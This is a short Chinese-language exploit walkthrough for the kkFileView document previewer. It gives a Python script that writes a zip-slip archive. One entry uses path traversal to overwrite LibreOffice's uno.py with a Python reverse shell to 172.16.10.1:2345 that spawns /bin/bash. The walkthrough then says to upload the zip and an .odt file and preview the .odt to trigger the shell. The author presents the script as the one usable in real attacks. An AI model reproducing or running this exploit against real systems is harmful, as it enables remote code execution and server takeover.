使用poc生成一个zip

首先，修改并执行poc.py，生成POC文件：
直接提供反弹shell脚本，实战中能用到的就这个，网上说是定时任务，但定时任务有些是没有的

import zipfile

if __name__ == "__main__":
    try:
        binary1 = b'vulhub'
        binary2 = b"import socket, subprocess, os; s = socket.socket(socket.AF_INET, socket.SOCK_STREAM); s.connect(('172.16.10.1', 2345)); os.dup2(s.fileno(), 0); os.dup2(s.fileno(), 1); os.dup2(s.fileno(), 2); p = subprocess.call(['/bin/bash', '-i']);"
        zipFile = zipfile.ZipFile("test.zip", "a", zipfile.ZIP_DEFLATED)
        # info = zipfile.ZipInfo("test.zip")
        zipFile.writestr("test", binary1)
        zipFile.writestr("../../../../../../../../../../../../../../../../../../../opt/libreoffice7.5/program/uno.py", binary2)
        zipFile.close()
    except IOError as e:
        raise e

运行代码之后生成zip

将zip，odt上传kkfileview

预览odt触发，将zip的恶意代码写入他的uno.py

反弹设立了成功